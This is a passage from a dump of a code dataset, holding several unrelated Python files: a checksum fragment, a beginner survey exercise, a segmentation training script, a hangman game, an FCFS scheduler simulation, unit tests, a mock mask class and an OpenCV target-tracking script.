[0-9A-F]{2}((:)?[0-9A-F]{2})*\")\n    print(\"\\tmessage has [0-9A-F]{2}((:)?[0-9A-F]{2})*\")\n    exit(-1)\n\n# Create the checksum of the message\nicv = struct.pack(' 18:\n        qtdmais18 += 1\n    if sexo in 'mM':\n        qtdhomens += 1\n    if sexo in 'Ff' and idade < 20:\n        qtdmulheresmenos20 += 1\n    cont += 1\n    while True:\n        resposta = str(input('Do you want to continue? [Y/N]')).strip()[0]\n        if resposta in 'YyNn':\n            break\n    if resposta in 'Nn':\n        break\nprint('{} people are older than 18.'.format(qtdmais18))\nprint('{} men were registered.'.format(qtdhomens))\nprint('{} women are younger than 20.'.format(qtdmulheresmenos20))\nprint('{} people were registered.'.format(cont))","sub_path":"basic-python/desafio069.py","file_name":"desafio069.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"345847618","text":"from __future__ import print_function\n\nimport argparse\nimport os\nimport pickle\nimport sys\nfrom datetime import datetime\n\nimport matplotlib\nimport numpy as np\nimport torch\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport code.archs as archs\nfrom code.utils.cluster.general import config_to_str, get_opt, update_lr\nfrom code.utils.cluster.transforms import sobel_process\nfrom code.utils.segmentation.data import make_Coco_dataloaders, \\\n    make_Potsdam_dataloaders\nfrom code.utils.segmentation.baselines.kmeans_segmentation_eval import \\\n    kmeans_segmentation_eval\nfrom code.utils.segmentation.baselines.isola_utils import isola_loss, \\\n    isola_set_patches\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--model_ind\", type=int, required=True)\nparser.add_argument(\"--arch\", type=str, required=True)\nparser.add_argument(\"--opt\", type=str, default=\"Adam\")\n\nparser.add_argument(\"--dataset\", type=str, required=True)\nparser.add_argument(\"--dataset_root\", type=str, required=True)\n\n# for COCO\nparser.add_argument(\"--fine_to_coarse_dict\", type=str,\n                    default=\"/users/xuji/iid/iid_private/code/datasets\"\n                            \"/segmentation/util/out/fine_to_coarse_dict.pickle\")\n\n# COCO and Potsdam\nparser.add_argument(\"--use_coarse_labels\", default=False,\n                    action=\"store_true\") # new\n\n# for COCO only\nparser.add_argument(\"--include_things_labels\", default=False,\n                    action=\"store_true\") # new\nparser.add_argument(\"--incl_animal_things\", default=False,\n                    
action=\"store_true\") # new\n\nparser.add_argument(\"--gt_k\", type=int, required=True)\n\nparser.add_argument(\"--lr\", type=float, default=0.01)\nparser.add_argument(\"--lr_schedule\", type=int, nargs=\"+\", default=[])\nparser.add_argument(\"--lr_mult\", type=float, default=0.1)\n\nparser.add_argument(\"--num_epochs\", type=int, default=3200)\nparser.add_argument(\"--batch_sz\", type=int, required=True)\n\nparser.add_argument(\"--out_root\", type=str,\n default=\"/scratch/shared/slow/xuji/iid_private\")\nparser.add_argument(\"--restart\", default=False, action=\"store_true\")\nparser.add_argument(\"--no_pre_eval\", default=False, action=\"store_true\")\n\nparser.add_argument(\"--coco_164k_curated_version\", type=int, default=-1)\n\nparser.add_argument(\"--save_multiple\", default=False, action=\"store_true\")\nparser.add_argument(\"--verbose\", default=False, action=\"store_true\")\n\nparser.add_argument(\"--max_num_kmeans_samples\", type=int, default=-1)\n\n# Isola options\nparser.add_argument(\"--isola_patch_side\", type=int, default=11)\n\n# data options common to both img1 and img2\nparser.add_argument(\"--no_sobel\", default=False, action=\"store_true\")\nparser.add_argument(\"--include_rgb\", default=False, action=\"store_true\")\n\nparser.add_argument(\"--pre_scale_all\", default=False,\n action=\"store_true\") # new\nparser.add_argument(\"--pre_scale_factor\", type=float, default=0.5) #\n\nparser.add_argument(\"--input_sz\", type=int, default=161)\n\n# data options for img2 (i.e. transforms we learn invariance/equivariance for)\n# jitter invariance\nparser.add_argument(\"--jitter_brightness\", type=float, default=0.4)\nparser.add_argument(\"--jitter_contrast\", type=float, default=0.4)\nparser.add_argument(\"--jitter_saturation\", type=float, default=0.4)\nparser.add_argument(\"--jitter_hue\", type=float, default=0.125)\n\n# flip equivariance\nparser.add_argument(\"--flip_p\", type=float, default=0.5)\n\nconfig = parser.parse_args()\n\nassert (not (config.no_sobel and (not config.include_rgb)))\nassert (\"Isola\" in config.arch)\n\nif \"Coco\" in config.dataset:\n if not config.include_rgb:\n config.in_channels = 2 # just sobel\n else:\n config.in_channels = 3 # rgb\n if not config.no_sobel:\n config.in_channels += 2 # rgb + sobel\n config.using_IR = False\nelif config.dataset == \"Potsdam\":\n if not config.include_rgb:\n config.in_channels = 1 + 2 # ir + sobel\n else:\n config.in_channels = 4 # rgbir\n if not config.no_sobel:\n config.in_channels += 2 # rgbir + sobel\n\n config.using_IR = True\nelse:\n assert (False)\n\n# list of dataloaders has one dataloader, which returns single pair (img,\n# mask) for training\nconfig.num_dataloaders = 1\nconfig.single_mode = True # used by dataset\n\nconfig.use_random_scale = False\nconfig.use_random_affine = False\n\nconfig.out_dir = os.path.join(config.out_root, str(config.model_ind))\n# assert(config.batch_sz % config.num_dataloaders == 0)\nconfig.dataloader_batch_sz = int(config.batch_sz / config.num_dataloaders)\n\n# copy of IID, or fully unsupervised eval, setting\n# PERM, one-to-one, IID:\n# mapping can be found and tested on *same set*\n\nif \"Coco10k\" in config.dataset:\n config.train_partitions = [\"all\"]\n config.mapping_assignment_partitions = [\"all\"]\n config.mapping_test_partitions = [\"all\"]\nelif \"Coco164k\" in config.dataset:\n config.train_partitions = [\"train2017\", \"val2017\"]\n config.mapping_assignment_partitions = [\"train2017\", \"val2017\"]\n config.mapping_test_partitions = [\"train2017\", 
\"val2017\"]\nelif config.dataset == \"Potsdam\":\n config.train_partitions = [\"unlabelled_train\", \"labelled_train\",\n \"labelled_test\"]\n config.mapping_assignment_partitions = [\"labelled_train\", \"labelled_test\"]\n config.mapping_test_partitions = [\"labelled_train\", \"labelled_test\"]\nelse:\n assert (False)\n\nprint(\"Given config: %s\" % config_to_str(config))\n\nif not os.path.exists(config.out_dir):\n os.makedirs(config.out_dir)\n\nif config.restart:\n given_config = config\n reloaded_config_path = os.path.join(given_config.out_dir, \"config.pickle\")\n print(\"Loading restarting config from: %s\" % reloaded_config_path)\n with open(reloaded_config_path, \"rb\") as config_f:\n config = pickle.load(config_f)\n assert (config.model_ind == given_config.model_ind)\n config.restart = True\n\n # copy over new num_epochs and lr schedule\n config.num_epochs = given_config.num_epochs\n config.lr_schedule = given_config.lr_schedule\n\n# Data -------------------------------------------------------------------------\n\n# datasets produce either 2 or 5 channel images based on config.include_rgb\n\n# because fully unsupervised\nassert (config.mapping_assignment_partitions == config.mapping_test_partitions)\n\nif \"Coco\" in config.dataset:\n dataloaders, mapping_assignment_test_dataloader, _ = \\\n make_Coco_dataloaders(config)\nelif config.dataset == \"Potsdam\":\n dataloaders, mapping_assignment_test_dataloader, _ = \\\n make_Potsdam_dataloaders(config)\nelse:\n raise NotImplementedError\n\nnum_train_batches = len(dataloaders[0])\nprint(\"length of train dataloader %d\" % num_train_batches)\nprint(\"length of mapping assign and test dataloader %d\" % len(\n mapping_assignment_test_dataloader))\n\nassert (len(dataloaders) == 1)\ndataloader = dataloaders[0]\n\n# networks and optimisers ------------------------------------------------------\n\nnet = archs.__dict__[config.arch](config)\nif config.restart:\n model_path = os.path.join(config.out_dir, \"latest_net.pytorch\")\n choose_best = False\n if not os.path.exists(model_path):\n print(\"latest doesn't exist, using best\")\n model_path = os.path.join(config.out_dir, \"best_net.pytorch\")\n choose_best = True\n net.load_state_dict(\n torch.load(model_path, map_location=lambda storage, loc: storage))\nnet.cuda()\nnet = torch.nn.DataParallel(net)\n\noptimiser = get_opt(config.opt)(net.module.parameters(), lr=config.lr)\nif config.restart:\n if not choose_best:\n optimiser.load_state_dict(\n torch.load(os.path.join(config.out_dir, \"latest_optimiser.pytorch\")))\n else:\n print(\"latest doesn't exist, using best\")\n optimiser.load_state_dict(torch.load(os.path.join(config.out_dir,\n \"best_optimiser.pytorch\")))\n\nif config.restart:\n if not choose_best:\n next_epoch = config.last_epoch + 1 # corresponds to last saved model\n else:\n next_epoch = np.argmax(np.array(config.epoch_acc)) + 1\n\n print(\"starting from epoch %d\" % next_epoch)\n\n # in case we overshot without saving\n config.epoch_acc = config.epoch_acc[:next_epoch]\n config.epoch_nmi = config.epoch_nmi[:next_epoch]\n config.epoch_ari = config.epoch_ari[:next_epoch]\n\n config.epoch_loss = config.epoch_loss[:(next_epoch - 1)]\nelse:\n config.epoch_acc = []\n config.epoch_nmi = []\n config.epoch_ari = []\n\n config.epoch_loss = []\n\n if (not config.no_pre_eval):\n torch.cuda.empty_cache()\n net.module.eval()\n acc, nmi, ari, masses = kmeans_segmentation_eval(config, net,\n mapping_assignment_test_dataloader)\n config.epoch_acc.append(acc)\n config.epoch_nmi.append(nmi)\n 
config.epoch_ari.append(ari)\n config.epoch_masses = masses.reshape((1, config.gt_k))\n\n print(\"Pre: acc %f nmi %f ari %f time %s\" % (acc, nmi, ari, datetime.now()))\n sys.stdout.flush()\n\n next_epoch = 1\n\nfig, axarr = plt.subplots(3, sharex=False, figsize=(20, 20))\n\nfor e_i in xrange(next_epoch, config.num_epochs):\n torch.cuda.empty_cache()\n\n net.module.train()\n is_best = False\n\n if e_i in config.lr_schedule:\n optimiser = update_lr(optimiser, lr_mult=config.lr_mult)\n\n avg_loss = 0. # over epoch\n\n for b_i, tup in enumerate(dataloader):\n net.module.zero_grad()\n\n img, mask = tup # cuda\n\n # no need for requires_grad or Variable (torch 0.4.1)\n if (not config.no_sobel):\n img = sobel_process(img, config.include_rgb, using_IR=config.using_IR)\n\n centre, other, adjacent = isola_set_patches(input_sz=config.input_sz,\n patch_side=config.isola_patch_side)\n adjacent_pred = net(img, centre=centre, other=other)\n\n loss = isola_loss(adjacent_pred, centre, other, adjacent, mask,\n verbose=config.verbose)\n\n if ((b_i % 100) == 0) or (e_i == next_epoch):\n print(\"Model ind %d epoch %d batch: %d loss %f \"\n \"time %s\" % \\\n (config.model_ind, e_i, b_i, float(loss.item()), datetime.now()))\n sys.stdout.flush()\n\n if not np.isfinite(loss.item()):\n print(\"Loss is not finite... %s:\" % str(loss.item()))\n exit(1)\n\n avg_loss += loss.item()\n\n loss.backward()\n optimiser.step()\n\n b_i += 1\n\n avg_loss /= num_train_batches\n avg_loss = float(avg_loss)\n\n torch.cuda.empty_cache()\n net.module.eval()\n\n acc, nmi, ari, masses = kmeans_segmentation_eval(config, net,\n mapping_assignment_test_dataloader)\n print(\"... metrics acc %f nmi %f ari %f time %s\" %\n (acc, nmi, ari, datetime.now()))\n sys.stdout.flush()\n\n if (len(config.epoch_acc) > 0) and (acc > max(config.epoch_acc)):\n is_best = True\n\n config.epoch_acc.append(acc)\n config.epoch_nmi.append(nmi)\n config.epoch_ari.append(ari)\n\n config.epoch_loss.append(avg_loss) # config stores 1\n\n masses = masses.reshape((1, config.gt_k))\n config.epoch_masses = np.concatenate((config.epoch_masses, masses), axis=0)\n\n axarr[0].clear()\n axarr[0].plot(config.epoch_loss)\n axarr[0].set_title(\"Loss\")\n\n axarr[1].clear()\n axarr[1].plot(config.epoch_acc)\n axarr[1].set_title(\"ACC\")\n\n axarr[2].clear()\n for c in xrange(config.gt_k):\n axarr[2].plot(config.epoch_masses[:, c])\n axarr[2].set_title(\"Masses (reordered)\")\n\n fig.canvas.draw_idle()\n fig.savefig(os.path.join(config.out_dir, \"plots.png\"))\n\n if is_best or (e_i % 10 == 0) or config.save_multiple:\n # save cpu version\n net.module.cpu()\n\n if is_best:\n torch.save(net.module.state_dict(),\n os.path.join(config.out_dir, \"best_net.pytorch\"))\n torch.save(optimiser.state_dict(),\n os.path.join(config.out_dir, \"best_optimiser.pytorch\"))\n\n # save model sparingly for this script\n if e_i % 10 == 0:\n torch.save(net.module.state_dict(),\n os.path.join(config.out_dir, \"latest_net.pytorch\"))\n torch.save(optimiser.state_dict(),\n os.path.join(config.out_dir, \"latest_optimiser.pytorch\"))\n config.last_epoch = e_i # for last saved version\n\n if config.save_multiple and (e_i % 3 == 0):\n torch.save(net.module.state_dict(),\n os.path.join(config.out_dir, \"e_%d_net.pytorch\" % e_i))\n\n net.module.cuda()\n\n with open(os.path.join(config.out_dir, \"config.pickle\"),\n \"wb\") as outfile:\n pickle.dump(config, outfile)\n\n with open(os.path.join(config.out_dir, \"config.txt\"),\n \"w\") as text_file:\n text_file.write(\"%s\" % 
config)\n","sub_path":"code/scripts/segmentation/baselines/isola.py","file_name":"isola.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570048377","text":"import random\nimport re\nimport hangmanpics\n\nwith open(\"words.txt\") as word_file:\n    words_list = word_file.read().splitlines()\n\nHANGMANPICS = hangmanpics.hangmanpics_list\n\n\ndef blankout_letters(word):\n    length = len(word)\n    if length > 4:\n        blank_positions = random.sample(range(1, length), int(2 * length / 3))\n    else:\n        blank_positions = random.sample(range(1, 5), 2)\n    return blank_positions\n\n\ndef generate_word():\n    chosen_word = words_list[random.randint(0, int(len(words_list) - 1))]\n    blankList = blankout_letters(chosen_word)\n    chosen_word_list = list(chosen_word)\n    return chosen_word, [letter if count not in blankList else \"_\" for count, letter in enumerate(chosen_word_list)]\n\n\nchosen_word, final_word_list = generate_word()\ntotal_attempts = 4\nattempts = total_attempts\ngame_won = False\n\n\ndef guess_name():\n    global attempts, final_word_list, game_won, HANGMANPICS\n    print(final_word_list)\n    user_input = input(f\"You have {attempts} attempts remaining \\n\")\n    fill_positions = [i.start() for i in re.finditer(re.escape(user_input), chosen_word)]\n    if len(fill_positions) == 0:\n        attempts -= 1\n        print(\"WRONG guess\")\n        print(HANGMANPICS[total_attempts - attempts - 1])\n    else:\n        final_word_list = [user_input if count in fill_positions else letter for count, letter in\n                           enumerate(final_word_list)]\n        if \"_\" not in final_word_list:\n            print(\"You guessed the word correctly!\")\n            attempts = 0\n            game_won = True\n            return\n        print(\"Correct guess\")\n\n\ndef reset_game():\n    global attempts, game_won, final_word_list, chosen_word\n    chosen_word, final_word_list = generate_word()\n    game_won = False\n    attempts = total_attempts\n\n\ndef play_game():\n    print(f\"Guess the word in {attempts} attempts\")\n    while attempts > 0:\n        guess_name()\n    if not game_won:\n        print(\"Hangman - You lose\")\n        print(f\"Word was - {chosen_word}\")\n    play_again = input(\"Play again ? 
- Y/N \\n\")\n if play_again == \"Y\" or play_again == 'y':\n reset_game()\n play_game()\n\nif __name__ == \"__main__\":\n play_game()\n","sub_path":"hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548387788","text":"import process as pr\r\nimport random as rnd\r\n\r\n\r\nglobal PROCESS_APPEAR_PROBABILITY\r\nglobal PROCESS_LIST\r\nglobal FINISHED_PROCESS_LIST\r\nglobal CURRENT_ITERATION\r\nglobal CURRENT_PROCESS\r\nglobal FREE_PROCESSOR\r\nglobal TASK_NUMBER\r\nglobal FINISHED_TASK_NUMBER\r\nglobal CURRENT_TASK_NUMBER\r\n\r\n\r\n\r\n\r\ndef planning():\r\n\tglobal CURRENT_ITERATION\r\n\tglobal TASK_NUMBER\r\n\tglobal FINISHED_TASK_NUMBER\r\n\tglobal FREE_PROCESSOR\r\n\tglobal CURRENT_PROCESS\r\n\tglobal CURRENT_TASK_NUMBER\r\n\tglobal FINISHED_PROCESS_LIST\r\n\twhile True:\r\n\t\t\r\n\t\tif TASK_NUMBER == FINISHED_TASK_NUMBER:\r\n\t\t\tbreak \r\n\r\n\t\tprint(\"-------------------------------------------------------------------------------\")\r\n\t\tprint(\"Iteration \", CURRENT_ITERATION)\r\n\t\tprint()\r\n\r\n\t\tif CURRENT_TASK_NUMBER < TASK_NUMBER:\r\n\t\t\tif rnd.random() < PROCESS_APPEAR_PROBABILITY:\r\n\t\t\t\tCURRENT_TASK_NUMBER += 1\r\n\t\t\t\tPROCESS_LIST.append(pr.Process(rnd.randint(3, 10), CURRENT_ITERATION, CURRENT_TASK_NUMBER))\r\n\t\t\t\tprint(\"Task \", CURRENT_TASK_NUMBER, \" appeared\")\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Task didn't appear\")\r\n\t\telse:\r\n\t\t\tprint(\"All tasks have already appeared. There will not be other tasks\")\r\n\t\t\t\t\r\n\t\tif FREE_PROCESSOR and PROCESS_LIST == []:\r\n\t\t\tprint (\"Processor is free. There are no task to compute\")\r\n\r\n\t\tif (FREE_PROCESSOR and PROCESS_LIST):\r\n\t\t\tFREE_PROCESSOR = False\r\n\t\t\tCURRENT_PROCESS = PROCESS_LIST.pop(0)\r\n\t\t\tCURRENT_PROCESS.start_time = CURRENT_ITERATION\r\n\r\n\r\n\t\t\t\r\n\t\tif CURRENT_PROCESS != []:\r\n\t\t\tCURRENT_PROCESS.execute();\r\n\t\t\tprint(\"Task \", CURRENT_PROCESS.name, \" is computing. 
Time to finish \", CURRENT_PROCESS.time_to_finish)\r\n\t\t\tfor element in PROCESS_LIST:\r\n\t\t\t\telement.wait();\r\n\r\n\t\t\tif CURRENT_PROCESS.time_to_finish == 0:\r\n\t\t\t\tFREE_PROCESSOR = True\r\n\t\t\t\tFINISHED_TASK_NUMBER +=1\r\n\t\t\t\tCURRENT_PROCESS.finish_time = CURRENT_ITERATION\r\n\t\t\t\tFINISHED_PROCESS_LIST.append(CURRENT_PROCESS)\r\n\t\t\t\tCURRENT_PROCESS = []\r\n\r\n\t\t\t\r\n\r\n\t\tCURRENT_ITERATION += 1\r\n\r\n\t\tprint(\"-------------------------------------------------------------------------------\")\r\n\r\n\r\ndef print_table():\r\n\tprint(\"Number | appear time | execute time | start time | finish time | wait time | full time |\")\r\n\tmiddle_wait_time = 0\r\n\tmiddle_executive_time = 0\r\n\tfor element in FINISHED_PROCESS_LIST:\r\n\t\tmiddle_wait_time += element.wait_time\r\n\t\tmiddle_executive_time += element.wait_time + element.executive_time\r\n\t\tprint(\" %5d | %5d | %5d | %5d | %5d | %5d | %5d |\" % (element.name, element.appear_time, element.executive_time, element.start_time, element.finish_time, element.wait_time, element.wait_time+element.executive_time))\r\n\tmiddle_wait_time = middle_wait_time/len(FINISHED_PROCESS_LIST)\r\n\tmiddle_executive_time = middle_executive_time/len(FINISHED_PROCESS_LIST)\r\n\tprint(\"Middle wait time for processes = \", middle_wait_time)\r\n\tprint(\"Middle executive time with waiting for processes = \", middle_executive_time)\r\n\r\n\t\t\r\n\r\n\t\t\r\n\t\t\r\n\r\n\r\nif __name__ == '__main__':\r\n\tPROCESS_APPEAR_PROBABILITY = 0.3\r\n\tPROCESS_LIST = []\r\n\tCURRENT_ITERATION = 0\r\n\tFREE_PROCESSOR = True\r\n\tTASK_NUMBER = 10\r\n\tFINISHED_TASK_NUMBER = 0\r\n\tCURRENT_PROCESS = []\r\n\tCURRENT_TASK_NUMBER = 0\r\n\tFINISHED_PROCESS_LIST = []\r\n\tplanning();\r\n\tprint_table()\r\n","sub_path":"lab1/FCFS.py","file_name":"FCFS.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494271745","text":"import unittest\nimport os.path\nimport analytics.forecast.historical as hist\nfrom datetime import datetime\n\n\nclass HistoricalDataTest(unittest.TestCase):\n def test_something(self):\n hist.read_multifile()\n\n def test_filename_parse(self):\n # Arrange\n fullpath = os.path.join(hist.data_dir, \"gfs.0p25.2019011012.f153-2019011500.f057.grib2.panzer408979.nc.tar\")\n now = datetime(year=2019, month=1, day=11)\n fc_time = datetime(year=2019, month=1, day=16, hour=3)\n\n # Act\n tf = hist.NetCDFRangeTarfile(fullpath)\n contained = tf.contains(now, fc_time)\n\n # Assert\n self.assertTrue(contained)\n\n def test_get_dataset(self):\n now = datetime(year=2019, month=1, day=11)\n fc_time = datetime(year=2019, month=1, day=16, hour=3)\n hist.get_dataset(now, fc_time)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"gui_and_analytics/analytics/forecast/test/test_historical.py","file_name":"test_historical.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480972768","text":"import autolens as al\n\nimport numpy as np\n\nfrom autolens import exc\nfrom autolens.array import mapping\nfrom autolens.array.util import mask_util\n\n\nclass MockMask(al.Mask):\n def __new__(cls, array, pixel_scale=1.0, sub_size=1, *args, **kwargs):\n\n obj = np.array(array, dtype=\"bool\").view(cls)\n obj.pixel_scale = pixel_scale\n obj.sub_size = sub_size\n obj.sub_length = int(sub_size ** 2.0)\n obj.sub_fraction = 1.0 / obj.sub_length\n obj.origin 
= (0.0, 0.0)\n obj.mapping = mapping.Mapping(mask=obj)\n\n return obj\n\n def __init__(self, array, pixel_scale=1.0, sub_size=1):\n pass\n\n def blurring_mask_from_psf_shape(self, psf_shape):\n \"\"\"Compute a blurring mask, which represents all masked pixels whose light will be blurred into unmasked \\\n pixels via PSF convolution (see grid.Grid.blurring_grid_from_mask_and_psf_shape).\n\n Parameters\n ----------\n psf_shape : (int, int)\n The shape of the psf which defines the blurring region (e.al. the shape of the PSF)\n \"\"\"\n\n if psf_shape[0] % 2 == 0 or psf_shape[1] % 2 == 0:\n raise exc.MaskException(\"psf_size of exterior region must be odd\")\n\n blurring_mask = al.mask_util.blurring_mask_from_mask_and_psf_shape(\n self, psf_shape\n )\n\n return MockMask(array=blurring_mask, pixel_scale=self.pixel_scale)\n\n\nclass MockMask1D(np.ndarray):\n def __new__(cls, shape, pixel_scale=1.0, *args, **kwargs):\n\n array = np.full(fill_value=False, shape=shape)\n\n obj = np.array(array, dtype=\"bool\").view(cls)\n obj.pixel_scale = pixel_scale\n obj.origin = (0.0, 0.0)\n\n return obj\n","sub_path":"test/unit/mock/data/mock_mask.py","file_name":"mock_mask.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345699078","text":"import cv2\nimport numpy as np\nimport logging\nimport nt_client\nimport ocupus_cam\n\n#cap=cv2.VideoCapture\ncap=cv2.VideoCapture(2)\n\nclient = nt_client.NetworkTableClient(\"3574\")\nclient.setValue(\"/Vision/Test\", \"howdy\")\n\nvertTopLeftX = 0\nvertTopLeftY = 0\nhorizBottomRightX = 0\nhorizBottomRightY = 0\n\nwhile True:\n r,f=cap.read()\n f = cv2.resize(f,(320,240))\n gray = cv2.cvtColor(f, cv2.COLOR_BGR2GRAY)\n\n contourCount = 0\n\n verAndHorClose = False\n logging.warning(str(vertTopLeftX) + \",\" + str(vertTopLeftY) + \" (vertTopLeftX),(vertTopLeftY) Log\")\n logging.warning(str(horizBottomRightX) + \",\" + str(horizBottomRightY) + \" (horizBottomRightX),(horizBottomRightY) Log\")\n closeX = vertTopLeftX - horizBottomRightX\n closeY = horizBottomRightY - vertTopLeftY \n logging.warning(str(closeX) + \",\" + str(closeY) + \" (closeX),(closeY) Log\")\n if (closeX < 50 and closeY < 50 and closeX + closeY != 0) :\n verAndHorClose = True\n else :\n verAndHorClose = False\n \n (thresh, im_bw) = cv2.threshold(gray, 250, 255, cv2.THRESH_BINARY)\n (contours, hierarchy) = cv2.findContours(im_bw,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n #cv2.drawContours(f, contours, -1, (0,255,0),3)\n\n c = len(contours)\n #cv2.putText(f,c,(5,25), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0,255,0))\n \n for j in range(0, len(contours)) :\n cnt = contours[j]\n \n perimeter = cv2.arcLength(cnt,True)\n #logging.warning(str(perimeter) + \" perimeter Log\")\n\n approx = cv2.approxPolyDP(cnt,0.01*perimeter,True)\n #logging.warning(str(j) + \" x Log\")\n #logging.warning(str(len(cnt)) + \" Len cnt\")\n \n area = cv2.contourArea(cnt)\n #logging.warning(str(area) + \" area Log\")\n \n if (area < 400 or perimeter < 100) :\n continue\n if (perimeter > area) :\n continue\n if (area > 10000 or perimeter > 1000) :\n continue\n if (perimeter + area > 10000) :\n continue\n \n k = cv2.isContourConvex(cnt)\n logging.warning(str(k) + \" k Log\")\n\n x,y,w,h = cv2.boundingRect(cnt)\n \n areaApprox = cv2.contourArea(approx)\n #areaIm = cv2.contourArea(im)\n if (h > 200 or w > 200) :\n continue\n if (areaApprox * 2 < area) :\n continue\n if (w == h) :\n continue\n #if (k == True) :\n #continue\n\n rect = 
cv2.minAreaRect(cnt)\n box = cv2.cv.BoxPoints(rect)\n box = np.int0(box)\n im = cv2.drawContours(f,[box],0,(0,0,255),2)\n img = cv2.rectangle(f,(x,y),(x+w,y+h),(255,0,0),2)\n\n logging.warning(str(w) + \" w Log\")\n logging.warning(str(h) + \" h Log\")\n logging.warning(str(w * h) + \" Blue area Log\")\n logging.warning(str((h * 2) + (w * 2)) + \" Blue perimeter Log\")\n\n if (w < h) : # vertical - yellow\n cv2.drawContours(f, [approx], -1, (0,255,255),3)\n contourCount += 1\n\n vertTopLeftX = x\n vertTopLeftY = y\n vertBottomRightX = x + w\n vertBottomRightY = y + h\n vertWidth = w\n vertHeight = h\n x1,y1,w1,h1 = x,y,w,h\n \n #if (0 < (w / h) < (32 / 32)) :\n contour1 = j\n vertical1 = True\n #client.setValue(\"/Vision/contour1\", contour1 * 1.0)\n \n logging.warning(str(x) + \", \" + str(y) + \" (x, y) Log\")\n logging.warning(str(j) + \" j Log\")\n logging.warning(str(k) + \" k Log\")\n logging.warning(str(len(cnt)) + \" Len cnt\")\n logging.warning(str(perimeter) + \" perimeter Log\")\n logging.warning(str(area) + \" area Log\")\n logging.warning(\"contour 1 \" + str(contour1))\n logging.warning(\"contour 1 vertical \" + str(vertical1))\n \n elif (h < w) : # horizontal - cyan\n cv2.drawContours(f, [approx], -1, (255,255,0),3)\n contourCount += 1\n\n horizTopLeftX = x\n horizTopLeftY = y\n horizBottomRightX = x + w\n horizBottomRightY = y + h\n horizWidth = w\n horizHeight = h\n x2,y2,w2,h2 = x,y,w,h\n \n #if (0 < (w / h) < (32 / 32)) :\n contour2 = j\n horizantal2 = True\n \n logging.warning(str(x) + \", \" + str(y) + \" (x, y) Log\")\n logging.warning(str(j) + \" j Log\")\n logging.warning(str(k) + \" k Log\")\n logging.warning(str(len(cnt)) + \" Len cnt\")\n logging.warning(str(perimeter) + \" perimeter Log\")\n logging.warning(str(area) + \" area Log\")\n logging.warning(\"contour 2 \" + str(contour2))\n logging.warning(\"contour 2 horizantal \" + str(horizantal2))\n \n else :\n cv2.drawContours(f, [approx], -1, (0,255,0),3)\n contour3 = j\n wrong3 = True\n\n logging.warning(str(j) + \" j Log\")\n logging.warning(str(k) + \" k Log\")\n logging.warning(str(len(cnt)) + \" Len cnt\")\n logging.warning(str(perimeter) + \" perimeter Log\")\n logging.warning(str(area) + \" area Log\")\n logging.warning(\"contour 3 \" + str(contour3))\n logging.warning(\"contour 3 wrong \" + str(wrong3))\n\n logging.warning(str(c) + \" c Log\")\n logging.warning(str(im) + \" im Log\")\n logging.warning(str(img) + \" img Log\")\n\n M = cv2.moments(cnt)\n if (M['m00'] != 0) :\n centroid_x = int(M['m10']/M['m00'])\n centroid_y = int(M['m01']/M['m00'])\n cv2.circle(f, (centroid_x, centroid_y), 1, (77, 177, 77), 5)\n cv2.circle(f, (x, y), 1, (177, 77, 177), 5)\n #cv2.circle(f, center, radius, color[, thickness[, lineType[, shift]]]) \n\n #rect = cv2.minAreaRect(cnt)\n #box = cv2.cv.boxPoints(rect)\n #box2 = np.int0(box)\n #im = cv2.drawContours(f,[box2],0,(0,0,255),2)\n logging.warning(str(contourCount) + \" contourCount Log\")\n if (contourCount == 2) :\n logging.warning(str(x1) + \", \" + str(y1) + \" (x1, y1) Log\")\n logging.warning(str(x2) + \", \" + str(y2) + \" (x2, y2) Log\")\n x2BottomRight = x2 + w2\n y2BottomRight = y2 + h2\n cv2.line(f, (x1, y1), (x2 + w2, y2 + h2), (107,7,255))\n logging.warning(str(x1 - x2) + \",\" + str(y1 - y2) + \" (x1 - x2),(y1 - y2) Log\")\n cv2.rectangle(f,(x1, y1),(x2 + w2, y2 + h2),(255,7,107),2)\n logging.warning(\"x,y:x,y \"\n + str(vertTopLeftX) + \",\"\n + str(vertTopLeftY) + \":\"\n + str(horizBottomRightX) + \",\"\n + str(horizBottomRightY))\n cv2.circle(f, 
(vertTopLeftX, vertTopLeftY), 1, (0, 127, 0), 5)\n cv2.circle(f, (horizBottomRightX, horizBottomRightY), 1, (0, 255, 0), 5)\n elif (contourCount != 2) :\n horizTopLeftX = 0\n horizTopLeftY = 0\n horizBottomRightX = 0\n horizBottomRightY = 0\n horizWidth = 0\n horizHeight = 0\n\n # send the contour count to the network tables\n client.setValue(\"/Vision/Vertical_And_Horizontal_Close\", verAndHorClose)\n logging.warning(str(verAndHorClose) + \" Vertical_And_Horizontal_Close\")\n \n cv2.imshow(\"gray\",gray)\n cv2.imshow(\"im_bw\",im_bw)\n cv2.imshow(\"f\",f)\n cv2.waitKey(1)\n \n #logging.warning('You smell haha get on my level')\n","sub_path":"getting2rectanglesandcomparing - High Resolution.py","file_name":"getting2rectanglesandcomparing - High Resolution.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172361172","text":"import argparse\n\n# Custom generator for our dataset\nfrom modules.python.models.train import train\nfrom modules.python.Options import TrainOptions\nfrom modules.python.FileManager import FileManager\n\"\"\"\nThe train module of HELEN trains a deep neural network to perform a multi-task classification. It takes a set of\nlabeled images from MarginPolish and trains the model to predict a base and the run-length of the base using a \ngated recurrent unit 